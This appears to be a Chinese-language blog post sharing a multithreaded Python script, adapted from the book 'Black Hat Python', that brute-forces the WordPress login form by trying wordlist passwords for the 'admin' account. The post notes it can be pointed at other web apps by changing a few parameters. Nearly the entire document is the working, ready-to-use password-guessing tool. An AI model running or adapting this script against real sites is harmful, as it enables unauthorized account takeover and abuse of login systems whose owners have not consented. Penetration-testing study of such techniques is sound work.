python多线程破解form登录(wordpress)

本文代码参考自《Black Hat Python: Python Programming for Hackers and Pentesters》
原书使用urllib,urllib2,HTMLParser等库实现,这里我用requests请求,pyquery来解析,更加方便一点。
这里只要修改一下前面的几个参数即可使用于其他的web程序,原书本用于破解joomla,这里我们改成了wordpress。
书里的代码可以去python代码仓库查看,这里用到的dir_bruster那个函数也在里面,我会不断更新这个仓库,push一些学到的python代码,欢迎交流。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#!/usr/bin/python
#coding=utf-8

import requests
import Queue
import threading
import sys
from pyquery import PyQuery as pq
from dir_bruster import build_wordlist

thread_count = 10
#login form url
target_url = 'http://192.168.99.196/wordpress/wp-login.php'
#login form action url
target_post = 'http://192.168.99.196/wordpress/wp-login.php'
username_field = 'log'
password_field = 'pwd'
username = 'admin'
wordlist = build_wordlist('./pwd.txt')

class Bruster(object):
'''
Brute web form using requests and pyquery
This example is for wordpress, you can change these global params to brute other web app:)
'''

def __init__(self, username, wordlist):
self.username = username
self.wordlist = wordlist
self.found = False

def run_brust(self):
for n in range(thread_count):
t = threading.Thread(target=self.brust_form)
t.start()

def brust_form(self):
while not self.wordlist.empty() and not self.found:
pwd = self.wordlist.get()
try:
s = requests.Session()
res = s.get(target_url)
body = self.parse(res.text)
body[username_field] = self.username
body[password_field] = pwd

print('Trying %s:%s (%d left)' % (self.username, pwd, self.wordlist.qsize()))
result = s.post(target_post, data=body)
if '密码不正确' not in result.content:
self.found = True
print('Brute successful by %s:%s' % (self.username, pwd))
except requests.ConnectionError as e:
print(e)

def parse(self, page):
'''
create post body
'''

par = pq(page)
inputs = par.find('input')
body = {}
for n in inputs:
if n.name is not None:
body[n.name] = ''
if n.value is not None:
body[n.name] = n.value
return body

b = Bruster(username, wordlist)
b.run_brust()